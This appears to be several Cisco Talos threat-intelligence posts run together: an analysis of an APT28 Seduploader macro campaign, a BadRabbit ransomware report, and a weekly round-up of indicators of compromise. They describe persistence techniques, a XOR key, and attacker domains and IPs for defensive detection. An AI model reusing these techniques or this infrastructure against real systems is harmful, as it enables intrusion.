• c3ff4ab8815d9934a5a2bb5e02de372e20d70ef2ea519bf96bd3188187ab8a63
• c0a5e770e251be820ac40cf249d5e30eb74be677bc2be054ffd07ceae23cbc33
• 89782f35fef2dad9aadcad63b07fb6ed39077c9edfdccd0716facac53293f872
• 51b411f1c6b10e8ee9bea405e66fc2f1f8f84d29106f119b2423de59101bbbd8
• 4d0bbd53f71ad27a77602fa1b2c3e9a1f92976052ce575f73b4a78d5f9f9ef1a
• 2cdaa2c24356b829da8b7aa4aac7e93f3727d9f7378f60e408fae2c2838237db
• 267d1e4423079ce2998b30ff031b854fd72f20754f693e958ed2aa537407b726
• 1b8ba3bde52f7c979d427a03d636c9658b010724b8b93fd98c31a888bcc3123c
• 18804047e5c39b2da8fdd601a63f8d066e2fc45cabe970859e09ffc7a9bd4823

Coverage

Screenshots of Detection

AMP

ThreatGrid

Beers with Talos (BWT) Podcast Episode 15 is now available.  Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

EP15 Show Notes: 

Overview

TALOS-2017-0432

Coverage

This post was authored by Warren Mercer, Paul Rascagneres and Vitor Ventura

Introduction

Cisco Talos discovered a new malicious campaign from the well known actor Group 74 (aka Tsar Team, Sofacy, APT28, Fancy Bear…). Ironically the decoy document is a flyer concerning the Cyber Conflict U.S. conference organized by the NATO Cooperative Cyber Defence Centre of Excellence on 7-8 November 2017 at Washington, D.C. Due to the nature of this document, we assume that this campaign targets people with an interest in cyber security. Unlike previous campaigns from this actor, the flyer does not contain an Office exploit or a 0-day, it simply contains a malicious Visual Basic for Applications (VBA) macro.

The VBA drops and executes a new variant of Seduploader. This reconnaissance malware has been used by Group 74 for years and it is composed of 2 files: a dropper and a payload. The dropper and the payload are quite similar to the previous versions but the author modified some public information such as MUTEX name, obfuscation keys... We assume that these modifications were performed to avoid detection based on public IOCs.

The article describes the malicious document and the Seduploader reconnaissance malware, especially the difference with the previous versions.

Malicious Office Document

Decoy Document

The decoy document is a flyer concerning the Cyber Conflict U.S. conference with the following filename Conference_on_Cyber_Conflict.doc. It contains 2 pages with the logo of the organizer and the sponsors:

Due to the nature of the document, we assume that the targeted people are linked or interested by the cybersecurity landscape. The exact content of the document can be found online on the conference website. The attackers probably copy/pasted it into Word to create the malicious document.

VBA

The Office document contains a VBA script. Here is the code:
The goal of this code is to get information from the properties of the document ("Subject", "Company", "Category", "Hyperlink base" and finally "Comments"). Some of this information can be directly extracted from the Windows explorer by looking at the properties of the file. The "Hyperlink Base" must be extracted using another tool, strings is capable of obtaining this by looking for long strings. Pay close attention to the contents of these fields as they appear base64 encoded.
This extracted information is concatenated together to make a single variable. This variable is decoded with the base64 algorithm in order to get a Windows library (PE file) which is written to disk. The file is named netwf.dat. On the next step this file is executed by rundll32.exe via the KlpSvc export. We see that this file drops 2 additional files: netwf.bat and netwf.dll. The final part of the VBA script changes the properties of these two files, setting their attributes to Hidden. We can also see 2 VBA variable names: PathPld, probably for Path Payload, and PathPldBt, for Path Payload Batch.

Seduploader Variant

Dropper Analysis

As opposed to previous campaigns performed by this actor, this latest version does not contain privilege escalation and it simply executes the payload and configures persistence mechanisms. The dropper installs 2 files:

• netwf.bat : executes netwf.dll
• netwf.dll : the payload

The dropper implements 2 persistence mechanisms:

• HKCU\Environment\UserInitMprLogonScript to execute the netwf.bat file
• COM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3D-C4579291692E}, the CLSID of the class MMDeviceEnumerator.

These 2 techniques have also been previously used by this actor.

Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by explorer.exe if the COM Object hijack is performed. In this case, explorer.exe will instance the MMDeviceEnumerator class and will execute the payload.

Payload Analysis

The payload features are similar to the previous versions of Seduploader. We can compare it to the sample e338d49c270baf64363879e5eecb8fa6bdde8ad9 used in May 2017 by Group 74. Of the 195 functions of the new sample, 149 are strictly identical, 16 match at 90% and 2 match at 80%:
In the previous campaign where adversaries used Office document exploits as an infection vector, the payload was executed in the Office word process. In this campaign, adversaries did not use any exploit. Instead,the payload is executed in standalone mode by rundll32.exe.

Adversaries also changed some constants, such as the XOR key used in the previous version. The key in our version is:

key=b"\x08\x7A\x05\x04\x60\x7c\x3e\x3c\x5d\x0b\x18\x3c\x55\x64"

The MUTEX name is different too: FG00nxojVs4gLBnwKc7HhmdK0h

Here are some of the Seduploader features:

• Screenshot capture (with the GDI API);
• data/configuration exfiltration;
• Execution of code;
• File downloading;

The Command & Control (CC) of the analysed sample is myinvestgroup[.]com. During the investigation, the server did not provide any configuration to the infected machines. Based on the metadata of the Office documents and the PE files, the attackers had created the file on Wednesday, the 4th of October. We can see, in Cisco Umbrella, a peak in activities 3 days later, Saturday the 7th of October:

Conclusion

Analysis of this campaign shows us once more that attackers are creative and use the news to compromise the targets. This campaign has most likely been created to allow the targeting of people linked to or interested by cybersecurity, so probably the people who are more sensitive to cybersecurity threats. In this case, Group 74 did not use an exploit or any 0-day but simply used scripting language embedded within the Microsoft Office document. Due to this change, the fundamental compromise mechanism is different as the payload is executed in a standalone mode. The reasons for this are unknown, but, we could suggest that they did not want to utilize any exploits to ensure they remained viable for any other operations. Actors will often not use exploits due to the fact that researchers can find and eventually patch these which renders the actors weaponized platforms defunct. Additionally the author did some small updates after publications from the security community, again this is common for actors of this sophisticated nature, once their campaigns have been exposed they will often try to change tooling to ensure better avoidance. For example the actor changed the XOR key and the MUTEX name. We assume that these modifications were performed in order to avoid detection based on public IOCs.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Files

Office Documents:

• c4be15f9ccfecf7a463f3b1d4a17e7b4f95de939e057662c3f97b52f7fa3c52f
• e5511b22245e26a003923ba476d7c36029939b2d1936e17a9b35b396467179ae
• efb235776851502672dba5ef45d96cc65cb9ebba1b49949393a6a85b9c822f52

Seduploader Dropper:

• 522fd9b35323af55113455d823571f71332e53dde988c2eb41395cf6b0c15805

Sedupload Payload:

• ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18

Networks

CC:

• myinvestgroup[.]com

Note: This blog post discusses active research by Talos into a new threat. This information should be considered preliminary and will be updated as research continues.

On October 24, 2017, Cisco Talos was alerted to a widescale ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape.

There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.

Distribution

Talos assesses with high confidence that a fake Flash Player update is being delivered via a drive-by-download and compromising systems. The sites that were seen redirecting to BadRabbit were a variety of sites that are based in Russia, Bulgaria, and Turkey.

When users visited one of the compromised websites, they were redirected to 1dnscontrol[.]com, the site which was hosting the malicious file. Before the actual malicious file was downloaded a POST request was observed to a static IP address (185.149.120[.]3). This request was found to be posting to a static path of "/scholasgoogle" and provided the user agent, referring site, cookie, and domain name of the session. After the POST the dropper was downloaded from two different paths from 1dnscontrol[.]com, /index.php and /flash_install.php. Despite two paths being utilized only a single file was downloaded. Based on current information, the malware appears to have been active for approximately six hours before the server 1dnscontrol[.]com was taken down. The initial download was observed around 2017-10-24 08:22 UTC.

The dropper (630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da) requires a user to facilitate the infection and does not use any exploit to compromise the system directly. This dropper contains the BadRabbit ransomware. Once installed there is an SMB component used for lateral movement and further infection. This appears to use a combination of an included list of weak credentials and a version of mimikatz similar to that which was used in Nyetya. Below is a list of the username/password combinations that we have observed. Note there is overlap with the 1995 cult classic "Hackers".

Observed Password List

Despite initial reports, we currently have no evidence that the EternalBlue exploit is being utilized to spread the infection. However, our research continues and we will update as we learn more.

Technical Details

The malware contains a dropper which is responsible for extracting and executing the worm payload. This payload contains additional binaries stored in the resources (compressed with zlib):

• legitimate binaries associated with DiskCryptor (2 drivers x86/x64 and 1 client);
• 2 mimikatz-like binaries (x86/x64) similar to the sample seen during Nyetya. A popular open source tool used for recovery of user credentials from computer memory using several different techniques.

It drops files into the C:\Windows\ directory. The mimikatz-like binaries are executed using the same technique that was leveraged in the Nyetya campaign. The communication between the payload and the stealer will be performed by a named pipe, for example:

C:\WINDOWS\561D.tmp \\.\pipe\{C1F0BF2D-8C17-4550-AF5A-65A22C61739C}

The malware then uses RunDLL32.exe to execute the malware and continue the malicious operations. The malware then creates a scheduled task with the parameters shown in the screenshot below:

In addition to the aforementioned scheduled task, the malware creates a second scheduled task that is responsible for rebooting the system. This second task does not occur instantaneously but is scheduled to occur later.

If the names for these scheduled tasks look familiar they appear to be a reference to Game of Thrones, specifically they match the names of the dragons. The malware also creates a file on the infected user's desktop called DECRYPT. Executing this file causes the following ransom note to be displayed to victims.

To demonstrate how quickly these sorts of threats can propagate globally, the below graphic reflects the DNS related activity associated with one of the domains that were being used to distribute the fake Adobe Flash update that was used to drop the malware on victims' systems.

The malware modifies the Master Boot Record (MBR) of the infected system's hard drive to redirect the boot process into the malware authors code for the purposes of displaying a ransom note. The ransom note that is displayed following the system reboot is below, and is very similar to the ransom notes displayed by other ransomware variants, namely Petya, that we have observed in other notable attacks this year.

This is the payment page from the TOR site:

Conclusion

This is yet another example of how effective ransomware can be delivered leveraging secondary propagation methods such as SMB to proliferate. In this example the initial vector wasn't a sophisticated supply chain attack. Instead it was a basic drive-by-download leveraging compromised websites. This is quickly becoming the new normal for the threat landscape. Threats spreading quickly, for a short window, to inflict maximum damage. Ransomware is the threat of choice for both its monetary gain as well as destructive nature. As long as there is money to be made or destruction to be had these threats are going to continue.

This threat also amplifies another key area that needs to be addressed, user education. In this attack the user needs to facilitate the initial infection. If a user doesn't help the process along by installing the flash update it would be benign and not wreak the devastation it has across the region. Once a user facilitates the initial infection the malware leverages existing methods, such as SMB, to propagate around the network without user interaction.

Coverage

Hashes (SHA256)

Dropper:

• 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

Payload:

• 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 C:\Windows\dispci.exe (diskcryptor client)
• 682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806 C:\Windows\cscc.dat (x32 diskcryptor drv)
• 0b2f863f4119dc88a22cc97c0a136c88a0127cb026751303b045f7322a8972f6 C:\Windows\cscc.dat (x64 diskcryptor drv)
• 579FD8A0385482FB4C789561A30B09F25671E86422F40EF5CCA2036B28F99648 C:\Windows\infpub.dat
• 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 (mimikatz-like x86)
• 301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c (mimikat-like x64)

Scheduled Tasks names

• viserion_
• rhaegal
• drogon

Domains

Distribution domain:

• 1dnscontrol[.]com

Distribution Paths:

• /flash_install.php
• /index.php

Intermediary Server:

• 185.149.120[.]3

Referrer Sites:

• Argumentiru[.]com
• Fontanka[.]ru
• Adblibri[.]ro
• Spbvoditel[.]ru
• Grupovo[.]bg
• www.sinematurk[.]com

Hidden service:

• caforssztxqzf2nm[.]onion

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between October 20 and October 27. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Doc.Macro.Downloader-6355564-0
  Office Macro
  Word documents making use of VBA macros to download additional binaries to further compromise the system. This cluster focuses on VBA importing external Win32 API to download and execute a file with the presence of an obfuscated URL.
   
• Doc.Macro.Obfuscation-6355576-0
  Office Macro
  Word documents making use of VBA macro obfuscation techniques to evade detection and prevent quick analysis. This cluster focuses on the repeated use of base64 encoded data encapsulating a substring used to created the desired string for malicious use.
   
• Win.Ransomware.Bucbi-6357228-0
  Ransomware
  This is a ransomware variant that encrypts a user's data and demands that a Bitcoin ransom be paid. To achieve this, the malware performs code injection and set registry keys for persistence. Moreover, the samples contain anti-debugging techniques to hinder analysis.
   
• Win.Trojan.Msil-6358223-0
  Trojan
  This .NET trojan creates a shortcut file in the Windows Startup folder for persistence, drops and executes a malicious VBScript and a .bat file, and downloads additional files from different websites.
   
• Win.Trojan.Tinba-6357827-1
  Trojan
  Tinba (or TinyBanker, or Hupigon) is an information stealer and banking trojan. It is capable of hooking into several popular web browsers in order to gather credentials to send back to an attacker controlled C2. It is custom packed and code is injected into an instance of winver or Explorer (or both, in that consecutive order) before execution reaches its intended purpose.
   
• Win.Trojan.Tovkater-6355575-0
  Trojan
  This malware is able to download and upload files, inject malicious code, and install additional malware.
   
• Win.Trojan.WillExec-6356235-0
  Trojan
  This  trojan injects into other processes, disables security features, and tries to contact several domains, waiting for instructions.
   
• Win.Trojan.Zusy-6357526-0
  Trojan
  This is a bank credential stealer which gathers online bank passwords, credit card numbers and social security numbers. The malware injects itself into winver.exe and explorer.exe.
   

---

Threats

Doc.Macro.Downloader-6355564-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 239[.]255[.]255[.]250

Domain Names

• site[.]sitez3[.]com

Files and or directories created

• %WinDir%\SoftwareDistribution\DataStore\DataStore.edb
• %AppData%\Microsoft\Windows\Cookies\7OT1LGP2.txt
• %SystemDrive%\~$1334139.doc
• \srvsvc
• %AppData%\Microsoft\Office\Recent\SAT_Documento741929.LNK
• \TEMP\SAT_Documento741929.doc

File Hashes

• d7630525cebf55d76096b2aa1d3fd10f00f8db98fb0ca0f9b5bdae5172913244
• 137dd479759fd525720874f4f94ee169950f46a41e7cc46b2159b10d28d61082
• 08d224602235aec498c31c1b1d16740d4ee294b5213a9236ff9ff09a8e07ae02
• 4922461d1524944042eb674ab0f04f43b9935c93c9cb6947f43dc546332161af
• 2d0b4e8f1d8f77838a97f1201fd114c63d19f67c7630725d04fd448c884e6b15
• 49cb1cde87383dc7b8feb70a3844cacb61bdbacbda67da19781be4ac67d8ca2f
• f18b9066ccb85df41cbd2686ce686324f7dadea23a0aecb58275dcbfa3db17b9
• 53c879eb61fa7079f1d78b97d79bf105dcd6eedbc65edf34634002c69c4a4db3
• 14da983e5dd73ca236f567fbbc09c7478f7575919b27b537cb0be0c87a1a808f
• 30a5a6f342fae27e81da59fa8a6c27e0730d0039bce9febd961ec33e436f9961
• b6e105246ff47a3263900ca49c4ad8255b56f3a72edb9c98dcb605eb096c1d32
• 06d2b9d3ca2e2bfc445ebb738261b47ec02787add1aea864d202e12cbcf65d74
• 8af2f1175a4599c2c7bb5100a6fd6edf2f1094573aaf12b8d63bff1c4182059c
• bea666206a9648750da4653ca55159ba5cb1677a1cd4de1df9dd53c452890c49
• 0ce3c8f42aa43764e76fdf620e2b19abe70903d3aeb0302ab774535bfb6bc163
• 4bb72db17e61dae3990c448d88a4de41cc5ffc50ab64486d73bceb7ec2e92655
• a80d57a9b68a0cf17e21d23de8c9912ab08335f1ecf2f01470f51d65aad3fc98
• 20c4888614517caf7f87e79e4f1e83ab1aa518f8ad1c55fef0f3c9c031c34405
• c1f30a7bf8c953b6a75152b8c06c474682b8269a4422bebb5f44288e8abca6a0
• c965d63446d4f6a6a7f392c8497f8d4c121a80ca92027affda967d0edd342c62

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Macro.Obfuscation-6355576-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• MC8D2645C
• Global\I98B68E3C
• MF4F51CA3
• Global\M98B68E3C

IP Addresses

• 81[.]169[.]145[.]76
• 194[.]88[.]246[.]9
• 239[.]255[.]255[.]250

Domain Names

• puikprodukties[.]nl

Files and or directories created

• \Users\Administrator\Documents\20171025\PowerShell_transcript.PC.BQAZNa49.20171025072414.txt
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\54180.exe
• %SystemDrive%\~$690febddc8bf29d57cee5e527e3a386d0d32afa4ae9bc1fa4a18cf849f5be3.doc
• %WinDir%\AppCompat\Programs\RecentFileCache.bcf
• \TEMP\~$690febddc8bf29d57cee5e527e3a386d0d32afa4ae9bc1fa4a18cf849f5be3.doc
• \TEMP\27690febddc8bf29d57cee5e527e3a386d0d32afa4ae9bc1fa4a18cf849f5be3.doc
• %WinDir%\SysWOW64\specsystem.exe

File Hashes

• 27690febddc8bf29d57cee5e527e3a386d0d32afa4ae9bc1fa4a18cf849f5be3
• 1ae79bf1ce63c3ea8d73f051cecb53d806bb477919d98257c363cb22d50410d1
• 74d3f7dc3417444e17a08c644807475c6b7b3e28316eb96a40877448417093c3
• 25aff8c96de125e1f922df676f3a117e07c0abb9e41b8d06bd6c995e614b8dec
• 664c26180cc669785d6e30140e07dfa538e66d8d9c38b9f1b8a94aecf9348fbe
• e135f8b2bd2588f94d47a084b75f0470fef7681c28fa0ddac71a80410beaea83
• 010e17653177339519c89f7ee9d67d4772928ae1c3eebaaf57191263ad2f4dbb
• 1f51f205991240c81a25d54d50cb05ffaa33a031560dea6d43e9423dc257c99d
• 61003d0b2697a5d457f8ef5fc219ec526dbdd41cb067230f3475edbb044ac649
• bb4795a99563991495f42f9b25395d5cc66d96cac7da4e4fbd1f6ae0f5019d18
• 31580e5f0462ce34241ab9d133edbaae3442840d1f5fd0a9958dd3cd0e750d7f
• 26bc8918448cc0fb9fb2d3f264006bb927ecc477b84f4f452606e2207e88f932
• 8aba5ce12e0df2f4fc6a58b4defbfc7fc0bae480740892d04f4fee9156f25ffd
• 9499a9a629a585fd75b7af3eacbc000c74a7eed240928a250ad580b8c8efc8d3
• 1e7de19e0636b8e224ce0d69b207d8bc5f8375b7bbc9228e43f426f5fdf05bc4
• a3fbecf3aa41c5b91274eb8c8319fd52c06fa5d20dc6c5f28bc535a8b17b2726
• 9131bc11a47c82ae466c719ab946fcac0a5e00e96e1bfc985d74e726526b4e84
• b6d69d0f0a3ee1dfb08f311c2ec0bab1b4e565ec4e03f23d555defdaf1b8dc9e
• 6e9d2d12a9d53fce2a16f63e18d970896f4a7f67bf40411c143fa3cf061ec4b8
• f1d99d9a6ff529ceba5bcfefffdea1aeece875db4563838095f6382888842a7a
• 5f2eda2978e6da11ba9f29a398f100531ceda1ec44a49dc5b7e013f711a850ad
• 32453c24c8e36e93a594650554ecd730d5d00a466b764c1d774fc344b009d58a
• fc82b57b5f2aeafd2a602321afa4a7f9a33ea0575f0329786b5c2598abef57a7
• fdd0acbdd96dd0fb72ca78fa84dca24577796e1cd977206280bc5ac715f32d02
• 640976b9ad42936e9cc75778292bb28f402321883a124a674a5a6551df481781

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Ransomware.Bucbi-6357228-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
• Value: SavedLegacySettings
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: IntranetName
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: AutoDetect
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: IntranetName
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
• Value: CachePrefix
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
• Value: CachePrefix
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
• Value: CachePrefix
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyServer
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: UNCAsIntranet
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
• Value: DefaultConnectionSettings
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: internat.exe
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: AutoConfigURL
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyEnable
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: AutoDetect
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyOverride
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
• <HKU>\Software\Microsoft\Windows\CurrentVersion\Run
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
• <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
• <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

Mutexes

• Local\ZonesCacheCounterMutex
• Local\ZonesLockedCacheCounterMutex

IP Addresses

• N/A

Domain Names

• shalunishka12[.]org
• caprice-porn[.]com

Files and or directories created

• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\lqwrnvdl.exe
• \Users\Administrator\AppData\Local\wikqsvpt.exe
• \Users\Administrator\AppData\Local\lpcqdivf

File Hashes

• 98e901f362641ae1fc6527215f496c9fd5de2d7f69b136ac610e453469831d07
• 6edf7c043348efe02d94c97a4d06ec735fb90a77ea290509e03991edadb24716
• f51719dfeac4f52a90d52188c3b3e9145d77f612da784510c968564aa0d46e9e
• 713413ee1a008b91a6afb29c52d2beda829778b8072c5ba5171bb50277104ebc
• a65293abd10e7c4a306ddfae94c67df2db411c4a29ca71a1ca8169ee640a8ed3
• feecc0baccecabeddc8f0e07b3a7aa54d7f13d60e232b7a538b10cd773b4c5e5

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Msil-6358223-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
• Value: CachePrefix
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
• Value: CachePrefix
• <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
• Value: F
• <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
• Value: F
• <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
• Value: F
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
• <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
• <HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel
• <HKCU>\Software\Microsoft\GDIPlus

Mutexes

• RasPbFile

IP Addresses

• 185[.]182[.]56[.]160
• 104[.]18[.]48[.]20
• 104[.]27[.]162[.]68
• 104[.]27[.]163[.]68
• 104[.]18[.]49[.]20

Domain Names

• paste[.]ee
• artishoker[.]com
• c[.]lewd[.]se

Files and or directories created

• %SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\KiuFCoY1QO9PiPVC.vbs
• \srvsvc
• %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\KiuFCoY1QO9PiPVC.lnk
• %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\KiuFCoY1QO9PiPVC.vbs
• %SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\KiuFCoY1QO9PiPVC.lnk
• \TEMP\Scanned_Purchase_order_image277253491.exe
• %TEMP%\1861034378.bat
• %AppData%\KiuFCoY1QO9PiPVC.exe

File Hashes

• e32a39503459bad0542ccbb75e9fb1f9dcd97784f14a34ac5baac20875984c1d
• 2549362e299c04fd309af6034c8edca26cb4666de123d948a729a6bb98959a02
• 1948216f19bdb2e0cd2d09d89611eec211dca86618d4d7be5c743b1433bce38b
• 91c6d351305ee145d33df951155c6700294d1caec3a3738ba758d35e98cb9b75
• ceffc973720d74d3afebfd38a6af2edd8237a875e1b636e794ea060220aeb4d2
• 7cbc85a09bebdd5675e9ddb74496c60ffa67558a0978f9c619e963ca9ba7b9a6
• 34eaf73bb07d3d0f9577d79283975a42566f193f61fbcaee616a2a4a366dbb28
• fbcacee6765ed156ce5751205b67efc2d8fdd2ef76cdfa67e157db0d7688031a
• d3014617acb71109befeea10e57b4b8fb7b8df05f66a55bb47d85f904b1ee32c
• 3e98b03a47e0629f095fcda6ca15dc48ec72b1af36711a41785547dfabfe1af9
• 9fd2b95cae0407e03575992690ffb155017fbdf9580b4466705f03601d01d0e3
• fbcacee6765ed156ce5751205b67efc2d8fdd2ef76cdfa67e157db0d7688031a
• 0cb8711d1f2a856178c34915f204a1af2b62b145c7817b9eee90ec1ae13ed6a2
• cab3246e2d185bb58c3e1163f520efe300832277f24336a647e5457380ef53d6
• ddc57143d6d212eecef60cb8ed95afa728425f976bc1db5eed74f2aa13228257
• c66c8be8191cefb7949fc13c7ef7f39bd2cd621c5d2f401bdec5d9e5ab738222
• b0b52c73ed116a84c16c1b71bab68fb1a669cbcafb0b06c676a6f3577ba7c555
• 411aff7bcef1f9b1f00b35f0d4fbf2ea42bea72931489fce1b3edaa327f4485b
• b1149077c5a8c4f9730d5db86d0cb19229cf192768d3eb30de2778c6529bd0b7
• 88e4751e486257ae14bfc4cd1c7bc5f5af5568314c54be43b6e02c8c852e93f7
• f19685621ec16a3c2810852acd1219e4d386119e0902486361fd2aa0d5ed3add
• 87f9d1b5d26155470684a6410dad447ed93307428a71115bbbfce22dd34fb00c
• 8f65d213186372f0eccee43e3f00ac145e9080858f1b384bf8faf4a39797a979
• 251b9967ce0b664734a3fc072ec89a120df406b796364de84c83305d89a6d747
• 1948216f19bdb2e0cd2d09d89611eec211dca86618d4d7be5c743b1433bce38b
• b536330f0d2028e2d561582fd1d4053860d54fe09b40212f8cb8ac8359241dac
• 7e2a3692d653fa12120f96b10a03e9f2adb4fb009bb941c66a00182427723b79
• ac98dab0fa4cefa816e001737ae5a8f1f08c8851d8afb8c9e75f722366705b0e
• 56690111926e192663f3cdc04b540a1bfbd6d498690d17d360082d57ec7569f5
• a611edd1273d31162da5a216b00d1460c433479719575018cd1cefd6a0fb297b
• 868ed435b09074e559bfcb5dab4aebe3ff1d766d0f31132ea0c8010a1eeb7f1d
• dc38e69467f8d08621b498eb59f58f9139a4373c15c0567ad15d531f0aeb4766
• c51c9254f951f491aafb9b4fb2098189db4fed06b065162c4c288b072a85c60b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Tinba-6357827-1

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: F9E7DE7B
• <HKU>\Software\Microsoft\Windows\CurrentVersion\Run

Mutexes

• F9E7DE7B
• \BaseNamedObjects\5D79E0A3

IP Addresses

• 216[.]218[.]185[.]162

Domain Names

• spaines[.]pw

Files and or directories created

• %AppData%\5D79E0A3\bin.exe
• %AppData%\F9E7DE7B\bin.exe

File Hashes

• 1a011db2ad073700f1ac9eaaf9760bf4c6569af894ff847520ea2918ea9228ee
• 2e125dcdec21f24ec0834fea0df684a0db2fe1f3c6556694f7c1e44259c34bae
• 664cd8de35ff1318c294bdca6390aa4bd434bd0270ae997a60a1e6772a50626b
• 883939af8de0ceb28c3e4d508b7815a1518148a1e253e8df979e95f8a697c3f1
• fc5e9a478435e9dac68b036779cec6fea60be92e852ba2f31ca2234550937670
• e488fc3c2381c55fcc2a7a59c36b39bcba20e4a37640bb45238607cb7e2062a1
• fef91305f435a16413c87b1db1e0891fdebba6eaa06a6ab4f3464e86a274e36e
• 69c82a3f309d7727631925cafb134077613689a78143523a12a335af9c8014fd
• 683d8a111660b32f7b928d0375388a64bf4c1a709a20b5997f39f1649751b656
• 35f336aad0bb9ea07e8f49b0e10105a8bc31dc9d79c302ed594ca3d47f3aedf2
• d9f7dad10fe09eb4586b1156caf25f490dbe285eb6c5f5598cc6f525e559f319
• 9ff90fcb71b6d0c44de05e9bc909778ebdcb743ea7a0ce6da42b06ea9126153a
